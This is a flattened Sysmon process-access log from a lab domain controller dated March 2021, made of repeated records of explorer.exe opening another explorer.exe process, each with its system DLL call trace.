16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 